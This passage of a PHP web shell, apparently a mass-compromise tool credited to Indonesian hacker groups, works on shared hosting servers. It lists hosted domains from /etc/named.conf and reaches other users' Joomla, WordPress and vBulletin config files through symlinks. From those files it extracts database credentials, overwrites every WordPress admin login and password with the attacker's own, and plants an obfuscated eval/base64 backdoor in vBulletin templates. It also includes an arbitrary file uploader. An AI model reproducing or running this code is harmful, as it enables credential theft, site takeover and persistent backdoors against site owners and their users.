  1080.  
  1081. $d00m = file("named.txt");
  1082.  
  1083.  
  1084. }
  1085. if(!$d00m)
  1086. {
  1087.  
  1088.                 die ("<meta http-equiv='refresh' content='0; url=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read'/>");
  1089. }
  1090. else
  1091.  
  1092. {
  1093. echo "<div class='tmp'>
  1094. <form method='POST' action='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$pg?sws=joomla'>
  1095. <input type='submit' value='Mass ching Admin' />
  1096. <input type='hidden' value='1' name='s' />
  1097. </form><br /><br />
  1098. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1099.  
  1100. $f = fopen('joomla.txt','w');
  1101.  
  1102. foreach($d00m as $dom){
  1103.  
  1104. if(eregi("zone",$dom)){
  1105.  
  1106. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1107.  
  1108. if(strlen(trim($domsws[1][0])) > 2){
  1109.  
  1110. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1111.  
  1112. ///////////////////////////////////////////////////////////////////////////////////
  1113.  
  1114. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  1115. $wpp=get_headers($wpl);
  1116. $wp=$wpp[0];
  1117.  
  1118. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  1119. $wpp2=get_headers($wp2);
  1120. $wp12=$wpp2[0];
  1121.  
  1122. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  1123. $wpp3=get_headers($wp3);
  1124. $wp13=$wpp3[0];
  1125.  
  1126.  
  1127.  ////////// joomla ////////////
  1128.  
  1129. $pos = strpos($wp, "200");
  1130. $config="� ";
  1131.  
  1132. if (strpos($wp, "200") == true )
  1133. {
  1134.  $config= $wpl;
  1135. }
  1136. elseif (strpos($wp12, "200") == true)
  1137. {
  1138.   $config= $wp2;
  1139. }
  1140. elseif (strpos($wp13, "200") == true)
  1141. {
  1142.   $config= $wp3;
  1143. }
  1144. else
  1145. {
  1146. continue;
  1147.  
  1148. }
  1149. flush();
  1150.  
  1151. /////////////////////////////////////////////////////////////////////////////////////
  1152.  
  1153. $dom = $domsws[1][0];
  1154.  
  1155. $w = fwrite($f,"$config||$dom \n");
  1156. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1157.  
  1158.  
  1159. echo "<tr><td><a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1160. <td><a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1161.  
  1162.  
  1163.  
  1164.  
  1165.  
  1166. flush();
  1167.  
  1168.  
  1169. }
  1170. }
  1171. }
  1172. }
  1173.  
  1174.  
  1175. break;
  1176.  
  1177. case 'wp':
  1178.  
  1179. ############################ index #########################3
  1180.  
  1181.  
  1182.  
  1183.  
  1184.  
  1185.  
  1186. ########  admin ##########33
  1187.  
  1188. if(isset($_POST['s'])){
  1189.  
  1190. $file = @file_get_contents('wp.txt');
  1191.  
  1192. $ex   = explode("\n",$file);
  1193.  
  1194. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1195. flush();
  1196. flush();
  1197.  
  1198.  
  1199. foreach ($ex as $exp){
  1200.  
  1201. $es   = explode("||",$exp);
  1202.  
  1203. $config = $es[0];
  1204.  
  1205. $domin = $es[1];
  1206.  
  1207. $domins = trim($domin).'';
  1208.  
  1209. $readconfig  = @file_get_contents(trim($config));
  1210.  
  1211. if(ereg('wp-settings.php',$readconfig)){
  1212.  
  1213.  
  1214.  
  1215. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
  1216.  
  1217. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
  1218.  
  1219. $db      =  ex($readconfig,"define('DB_NAME', '","');");
  1220.  
  1221. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
  1222.  
  1223. $tab     = $fix.'users';
  1224.  
  1225. $con     = @mysql_connect('localhost',$userdb,$pass);
  1226.  
  1227. $db      = @mysql_select_db($db,$con);
  1228.  
  1229. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='ScreaM-Crew'") or die;
  1230.  
  1231. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  1232.  
  1233.  
  1234.  
  1235. if ($query){$r = '<b style="color: #006600">Succeed </b>user [ScreaM-Crew] pass [1]</b>';}
  1236.  
  1237. else
  1238.  
  1239. {
  1240.  
  1241. $r = '<b style="color:red">failed</b>';
  1242.  
  1243. }
  1244.  
  1245. $domins = trim($domin).'';
  1246.  
  1247. echo "<tr>
  1248. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1249. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1250.  
  1251. flush();
  1252. flush();
  1253.  
  1254.  
  1255.  
  1256.  
  1257.  
  1258.  
  1259. }else{
  1260.  
  1261. echo "<tr>
  1262. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1263. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1264.  
  1265. flush();
  1266. flush();
  1267.  
  1268. }
  1269.  
  1270. }
  1271.  
  1272.  
  1273.  
  1274.  
  1275.  
  1276.  
  1277.  
  1278.  
  1279.  
  1280.  
  1281. die();
  1282.  
  1283. }
  1284.  
  1285. if(!is_file('named.txt')){
  1286.  
  1287. $d00m = @file("/etc/named.conf");
  1288.  
  1289. }else{
  1290.  
  1291. $d00m = @file("named.txt");
  1292.  
  1293.  
  1294. }
  1295. if(!$d00m)
  1296. {
  1297.  
  1298.                 die ("<meta http-equiv='refresh' content='0; url=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read'/>");
  1299. }
  1300. else
  1301.  
  1302. {
  1303. echo "<div class='tmp'>
  1304. <form method='POST' action='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$pg?sws=wp'>
  1305. <input type='submit' value='Mass Change Admin' />
  1306. <input type='hidden' value='1' name='s' />
  1307. </form>
  1308. <br /><br />
  1309. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1310.  
  1311. flush();
  1312. flush();
  1313.  
  1314. $f = fopen('wp.txt','w');
  1315.  
  1316. foreach($d00m as $dom){
  1317.  
  1318. if(eregi("zone",$dom)){
  1319.  
  1320. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1321.  
  1322. if(strlen(trim($domsws[1][0])) > 2){
  1323.  
  1324. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1325.  
  1326. ///////////////////////////////////////////////////////////////////////////////////
  1327.  
  1328. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1329. $wpp=get_headers($wpl);
  1330. $wp=$wpp[0];
  1331.  
  1332. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1333. $wpp2=get_headers($wp2);
  1334. $wp12=$wpp2[0];
  1335.  
  1336. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1337. $wpp3=get_headers($wp3);
  1338. $wp13=$wpp3[0];
  1339.  
  1340.  
  1341.  ////////// wp ////////////
  1342.  
  1343. $pos = strpos($wp, "200");
  1344. $config="� ";
  1345.  
  1346. if (strpos($wp, "200") == true )
  1347. {
  1348.  $config= $wpl;
  1349. }
  1350. elseif (strpos($wp12, "200") == true)
  1351. {
  1352.   $config= $wp2;
  1353. }
  1354. elseif (strpos($wp13, "200") == true)
  1355. {
  1356.   $config= $wp3;
  1357. }
  1358. else
  1359. {
  1360. continue;
  1361.  
  1362. }
  1363. flush();
  1364.  
  1365. /////////////////////////////////////////////////////////////////////////////////////
  1366.  
  1367. $dom = $domsws[1][0];
  1368.  
  1369. $w = fwrite($f,"$config||$dom \n");
  1370. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1371.  
  1372.  
  1373. echo "<tr><td><a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1374. <td><a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1375. flush();
  1376. flush();
  1377.  
  1378.  
  1379.  
  1380.  
  1381.  
  1382. flush();
  1383.  
  1384.  
  1385. }
  1386. }
  1387. }
  1388. }
  1389.  
  1390.  
  1391. break;
  1392.  
  1393.  
  1394. case 'vb':
  1395.  
  1396.  
  1397. if(isset($_POST['s'])){
  1398.  
  1399.  
  1400.  
  1401. $file = @file_get_contents('vb.txt');
  1402.  
  1403. $ex   = explode("\n",$file);
  1404.  
  1405. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1406.  
  1407.  
  1408. foreach ($ex as $exp){
  1409.  
  1410. $es   = explode("||",$exp);
  1411.  
  1412. $config = $es[0];
  1413.  
  1414. $domin = $es[1];
  1415.  
  1416. $domins = trim($domin).'';
  1417.  
  1418. $readconfig  = @file_get_contents(trim($config));
  1419.  
  1420. if(ereg('vBulletin',$readconfig)){
  1421.  
  1422.  
  1423.  
  1424. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1425.  
  1426. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1427.  
  1428. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1429.  
  1430. $con     = @mysql_connect('localhost',$userdb,$pass);
  1431.  
  1432. $db      = @mysql_select_db($db,$con);
  1433.  
  1434. $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1435.  
  1436. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  1437.  
  1438. $crypt .= "$shell";
  1439.  
  1440. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1441.  
  1442. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1443.  
  1444. $query  = @mysql_query($sqlfaq,$con);
  1445.  
  1446.  
  1447.  
  1448. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1449.  
  1450. else
  1451.  
  1452. {
  1453.  
  1454. $r = '<b style="color:red">failed</b>';
  1455.  
  1456. }
  1457.  
  1458. $domins = trim($domin).'';
  1459.  
  1460. echo "<tr>
  1461. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1462. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1463.  
  1464.  
  1465.  
  1466.  
  1467.  
  1468.  
  1469.  
  1470. }else{
  1471.  
  1472. echo "<tr>
  1473. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$domins'>$domin</a></td>
  1474. <td><a target='_blank' href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1475. }
  1476.  
  1477. }
  1478.  
  1479.  
  1480.  
  1481.  
  1482.  
  1483.  
  1484.  
  1485.  
  1486.  
  1487.  
  1488. die();
  1489.  
  1490. }
  1491.  
  1492. if(!is_file('named.txt')){
  1493.  
  1494. $d00m = file("/etc/named.conf");
  1495.  
  1496. }else{
  1497.  
  1498. $d00m = file("named.txt");
  1499.  
  1500.  
  1501. }
  1502. if(!$d00m)
  1503. {
  1504.  
  1505.                 die ("<meta http-equiv='refresh' content='0; url=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/video.php?sws=read'/>");
  1506. }
  1507. else
  1508.  
  1509. {
  1510. echo "<div class='tmp'>
  1511. <form method='POST' action='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$pg?sws=vb'>
  1512. <input type='submit' value='Inject shell' />
  1513. <input type='hidden' value='1' name='s' />
  1514. </form>
  1515. <br /><br />
  1516. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1517.  
  1518. $f = fopen('vb.txt','w');
  1519.  
  1520. foreach($d00m as $dom){
  1521.  
  1522. if(eregi("zone",$dom)){
  1523.  
  1524. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1525.  
  1526. if(strlen(trim($domsws[1][0])) > 2){
  1527.  
  1528. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1529.  
  1530. ///////////////////////////////////////////////////////////////////////////////////
  1531.  
  1532. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1533. $wpp=get_headers($wpl);
  1534. $wp=$wpp[0];
  1535.  
  1536. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1537. $wpp2=get_headers($wp2);
  1538. $wp12=$wpp2[0];
  1539.  
  1540. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1541. $wpp3=get_headers($wp3);
  1542. $wp13=$wpp3[0];
  1543.  
  1544.  
  1545.  ////////// vb ////////////
  1546.  
  1547. $pos = strpos($wp, "200");
  1548. $config="� ";
  1549.  
  1550. if (strpos($wp, "200") == true )
  1551. {
  1552.  $config= $wpl;
  1553. }
  1554. elseif (strpos($wp12, "200") == true)
  1555. {
  1556.   $config= $wp2;
  1557. }
  1558. elseif (strpos($wp13, "200") == true)
  1559. {
  1560.   $config= $wp3;
  1561. }
  1562. else
  1563. {
  1564. continue;
  1565.  
  1566. }
  1567. flush();
  1568.  
  1569. /////////////////////////////////////////////////////////////////////////////////////
  1570.  
  1571. $dom = $domsws[1][0];
  1572.  
  1573. $w = fwrite($f,"$config||$dom \n");
  1574. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1575.  
  1576.  
  1577. echo "<tr><td><a href=http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1578. <td><a href='http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/$config'>config</a></td><td>".$r."</td></tr>";
  1579.  
  1580.  
  1581.  
  1582.  
  1583.  
  1584. flush();
  1585.  
  1586.  
  1587. }
  1588. }
  1589. }
  1590. }
  1591.  
  1592.  
  1593.  
  1594.  
  1595.  
  1596.  
  1597.  
  1598.  
  1599. break;
  1600.  
  1601. case 'help':
  1602.  
  1603. echo "<div class='tmp'>
  1604. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1605.  
  1606.  
  1607. $safe_mode = ini_get('safe_mode');
  1608.      if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1609.  
  1610. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1611.  
  1612. $fun = function_exists('symlink');
  1613.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1614.  
  1615. echo "<tr><td>function symlink</td><td>$r</td>";
  1616.  
  1617.  
  1618. $fun = function_exists('file');
  1619.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1620.  
  1621. echo "<tr><td>function file</td><td>$r</td>";
  1622.  
  1623. $fun = function_exists('file_get_contents');
  1624.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1625.  
  1626. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1627.  
  1628. $fun = function_exists('mkdir');
  1629.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1630.  
  1631. echo "<tr><td>function mkdir</td><td>$r</td>";
  1632.  
  1633.  
  1634. $fun = is_dir('sym/root');
  1635.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1636.  
  1637. echo "<tr><td>Permission denied</td><td>$r</td>";
  1638.  
  1639.  
  1640. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1641.      if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1642.  
  1643. echo "<tr><td>Forbidden</td><td>$r</td>";
  1644.  
  1645.  
  1646.  
  1647.  
  1648. echo "</table></div>";
  1649.  
  1650.  
  1651.  
  1652. break;
  1653. default:
  1654. header("Location: $pg");
  1655.  
  1656.  
  1657.  
  1658.  
  1659. }
  1660.  
  1661.  
  1662. /// home ///
  1663. }else
  1664. {
  1665.  
  1666.  
  1667. echo '<br /><br /><form action=http://anonymouse.org/cgi-bin/anon-www.cgi/http://easymp3.eu/"" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1668. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1669. if( $_POST['_upl'] == "Upload" ) {
  1670.         if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1671.         else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1672.  
  1673.  
  1674. }
  1675.  
  1676.     echo '
  1677. <br /><br /><br /></b></b><div class="fot">Coded by <b><font color="red">Mr.Z</font></b> </Br>Thanks to : </b><b>Mr.Alsa3ek - </b><b>S3n4t00r </b>
  1678. <br /><br />
  1679. <b style="color: red";>  | Manusia Biasa Team  </b>
  1680. <b style="color: red";>  | sund4nyM0uz  </b>
  1681. <b style="color: red";>  | JKT48 HackerTeaM  </b>
  1682. <b style="color: red";>  | Teamr00t Cyber  </b>
  1683. <b style="color: red";>  | Indonesian Hacker  </b>
  1684. <b style="color: red";>  | Indonesian Defacer  </b>
  1685. <b style="color: red";>  | And You :*  </b>
  1686. <br /><br />
  1687. ---------------------</div> ';
  1688.  
  1689. }
  1690.  
  1691.  
  1692. function ex($text,$a,$b){
  1693. $explode = explode($a,$text);
  1694. $explode = explode($b,$explode[1]);
  1695. return $explode[0];
  1696. }
  1697.  
  1698.  
  1699.  
  1700. echo '</div>
  1701.  
  1702.  
  1703.  
  1704. </body>
  1705.  
  1706. </html>
  1707. ';
  1708.  
  1709. ?>